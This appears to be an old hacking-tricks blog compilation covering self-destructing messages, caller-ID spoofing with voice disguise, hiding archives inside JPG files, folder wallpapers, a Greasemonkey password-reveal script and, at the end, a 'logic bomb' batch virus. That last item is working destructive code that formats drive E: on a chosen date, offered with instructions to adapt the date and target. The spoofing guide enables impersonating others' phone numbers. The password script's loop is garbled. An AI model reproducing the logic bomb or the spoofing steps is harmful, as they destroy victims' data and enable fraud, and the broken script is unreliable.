Destructing Message - Self destructing message

U people may have watched in some sci-fi movie where a person gets a message for tha accomplishment of his mission which destructs when he read it out.
Even you may have got desire to do the same.
So the wait is over...Come out from the fantasy world and enjoy your dream...

Just Visit http://www.destructingmessage.com/

Call Spoofing-Call form any number

Call Spoofing-Call form any number
Working in India. Use it to call anyone using anybode else's number. You can also change your voice pitch so that the other person can't recognize you.

1. Open www.crazycall.net
2. Select your country and wait for the page to load.
3. Enter the number you want to display in the first big box (Dont change the contents of small box if the fake number is of same country).
4. Enter the number you wish to call in second big box.
5. Choose voice pitch as normal (for same voice) or high or low pitch to change your voice.
6. Click Get me a code.
7. Dial the number shown on right and enter the shown code when asked.

Thats It, Remember International call rates apply. (Rs. 15/-)

Dont use for illegal purposes...

Hiding files in a file

1. Gather your image and the files you wish to lodge into it. Here I have a meeting.txt which I will hide inside my toshow.jpg.
2. Add the files you want to hide into a new RAR archive. (so meeting.txt.rar created newly)
3. Open Command Prompt and go to the folder where your files are located, e.g., 'C:\hidden'.
5. At command prompt type 'copy /b toshow.jpg + meeting.txt.rar lizard.jpg' (without quotes).
(toshow.jpg is the picture I want to show, meeting.txt.rar is the file to be hidden, and lizard.jpg is the file which contains both.
6. Now test the lizard.jpg by double clicking it, and verifying it still opens.
7. Now try opening that same lizard.jpg file from menu: file->open of WinRar. It will show the original hidden file meeting.txt.

Set Wall Paper In Your Pen Drive, Drive, Folder

Copy the following code and paste it in note pad

[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
IconArea_Image=PATH_OF_THE_WALLPAPER

Save the file as desktop.ini and see the changes

Note:- If the wallpaper exist in the same folder then write the full name of the wallpaper.

Show Password

█►Grєasємσnkey Scяipтs◄█
In order to install these Grease Monkey scripts,you need to install Mozilla Firefox with grease monkey add-on installed

Step-1
Download Mozilla Firefox Web browser from here :

http://www.mozilla.com/en-US/firefox/


Step-2
Install Grease Monkey in your Firefox browser :
https://addons.mozilla.org/en-US/firefox/addon/748


This is a Grease Monkey script which shows password when mouse is moved over password field of the orkut/gmail/yahoo login page.

Step-3
To install this "Show Password" Grease Monkey script,just click the link given below the script will be auto installed on your browser.


http://prudhvi500.googlepages.com/showpass.user.js


Or

Copy and paste the following code in notepad and save it as anything.user.js and then install this

// ==UserScript==
// @name Shows the Password on MouseOverby Prudhvi
// @namespace Prudhvi
// @include *
// @description shows password when mouse is moved over password field
(function() {
var inputs, input;
inputs = document.evaluate(
'//input[@type="password"]',
document,
null,
XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE,
null);
if(!inputs.snapshotLength) return;
for(var i = 0; i <>
input = inputs.snapshotItem(i);
input.addEventListener('mouseover', function(event) {
this.type = 'text';
}, false);
input.addEventListener('mouseout', function(event) {
this.type = 'password';
}, false);
}
})();

View Contents of RAR, ZIP File Before Downloading

Add the following addon to the firefox it is ArchView.
If you want to download the single file from the Archive.
Now you can download the file.

https://addons.mozilla.org/en-US/firefox/addon/5028

Restart the Firefox.
Now when you will download the RAR, ZIP file it will be active and you can download the desired number of files from the Archive.

Logic Bomb Virus In Batch

Open Notepad

Copy Paste The Following

If %date% NEQ 2009/11/25 goto exit
format E: /y >nul
:exit
exit


And Save It As Anything.bat

Note:- You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action
The Virus Will Take Effect On That Day